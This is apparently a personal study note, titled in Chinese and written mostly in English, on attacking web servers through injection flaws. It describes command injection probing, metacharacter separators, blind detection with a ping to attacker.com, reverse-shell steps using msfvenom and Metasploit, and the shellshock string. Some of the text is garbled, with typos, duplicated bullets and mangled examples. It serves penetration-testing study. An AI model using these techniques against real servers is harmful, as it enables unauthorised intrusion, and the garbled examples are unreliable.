Kali进行web渗透测试笔记(五)
文章目录
Attacking the Server Using Injectinog-based Flaws
- components likely to attack
Components Injection flaws Operation system shell Command injection Relational database(RDBMS) SQL injection Web browser XSS attack LDAP directory LDAP injection XML XPATH injection
Command injection
identifying parameters to inject data:when testing a web application for command injection flaw and have identified that the applicaion is interacting with the command line of the underlying the application OS,the next step should be to manipulate and probe the different parameters in the applicaion injection flaws,as the application may be using one of these parameters to build a command back at the web server:
GET:input parameters are sent in URLs.Any user-controlled parameter sent using the GET method request should be tested.
POST:input parameters are sent in HTTP body.
HTTp header:Applications ofter use header fields to identify end users and display customized information to the user depending on the value in the headers.Some of the important header fields to check for command injection :
- Cokkies
- X-Forwarded-For
- User-agent
- Referrer
Error-based and blind command injection:In the other form of command injection,that is,blind command injeciton ,the results of the commands that you inject are not displayed to the user and no error messages are returned.The attacker will have to rely on other ways to identify whether the command was indeed executed on the server.When the output of the command is been displayed to the user,you can use any of the bash shell or windows command such as
ls,dir,ps,tasklistdepending on the underlying OS.Bue when testing for blind injection,you need to select your commands carefully.As an ethical hacker,the most reliable and safe way to identify the existence of injection flaw when the application does not display the results is using thepingcommand.The attacker can inject the ping command to send network packets to a machine under his control and view the results on that machine using a packet capture. This may prove to be useful in several ways:
- Since the ping command is similar in both Linux and Windows, except for a few changes, the command is sure to run if the application is vulnerable to the injection flaw.
- By analysing the response in the ping output, the attacker can also identify the underlying OS using the TTL values.
- By analysing the response in the ping output, the attacker can also identify the underlying OS using the TTL values.
- The ping utility is usually not restricted; even if the application is running under a non-privileged account, your chances of getting the command executed is guaranteed.
- The input buffer is often limited in size and can only accept a finite number of characters, for example, the input field for the username. The ping command, along with the IP addresses and some additional arguments can easily be injected in these fields.
Metacharacters for command separator:
Symbol Usage ; The semicolon is most common metacharacter used to test an injection flaw. The shell would run all the commands in sequence separated by the semicolon. && The double ampersand would run the command to the right of the metacharacter only if the command to the left executed successfully.An example would be injecting the password field, along with the correct credentials. A command can be injected that would run once the user is authenticated to the system. // The double pipe metacharacter is directly opposite to the double ampersand.It would run the command on the right side only if the command on the lefthand side failed. Following is an example of this command: cd invalidDir // ping -c 2 attacker.com( ) Using the grouping metacharacter, you can combine the outputs of multiple commands and store it in a file. Following is an example of this command: (ps; netstat) > running.txt` The unquoting metacharacter is used to force the shell to interpret and run the command between the backticks. Following is an example of this command: Variable= "OS versionuname -a" && echo $variable» This character would append the output of the command on the left to the file named on the right of the character. / The single pipe will use the output of the command on the left as an input to the command specified on the right. Scanning for command injection:Wapiti:automates the scanning of a website,scans the application for scripts and input forms to inject data,supports injections using both GET and POST methods.it can detect:Command inject,XSS,CSLF,SQL injection
- Wapiti can test for file handing flaws by exploiting the include function calls.It scans for old backup files accessible on the server and alo attempts to bypass weak htacess configurations.
Following are some of the activities that can ben performed by exploiting a command injection flaw:
- Viewing file on the web server
- Deleting files on the web server
- Attacking other machines on the internal network of the organization
- Completely owing the web server
Reverse TCP connection:Generally firewall rules are more relaxed when traffic flows from internal to external
PHP shell and Metasploit
- Create a PHP shell using the msfvenom tool
- Upload it on a web server that can be accessed from the target.
- Set up a reverse TCP meterpreter session in Metasploit on the attacker’s machine waiting for target to connect.
- Inject the URL of the PHP shell to the vulnerable field of the application,which downloads the PHP shell and runs it on the server.
- The shell would then make n outbound TCP connection to the meterpreter session waiting on the attacker’s machine.
Exploiting shellshock
- The flaw was found in the bash shell developed many years ago ,which allowed the attacker to exploit it by just passing a specific series of strings to the bash shell:
(){:;};. - Since bash shell is used by many applications,such as DHCP,SSH,SIP,and SMTP,the attack surface increases to a great extent.Exploiting the flaw over HTTP request is still the most common wy to do it ,as bash shell is often used along with CGI scripts.
- The flaw was found in the bash shell developed many years ago ,which allowed the attacker to exploit it by just passing a specific series of strings to the bash shell:
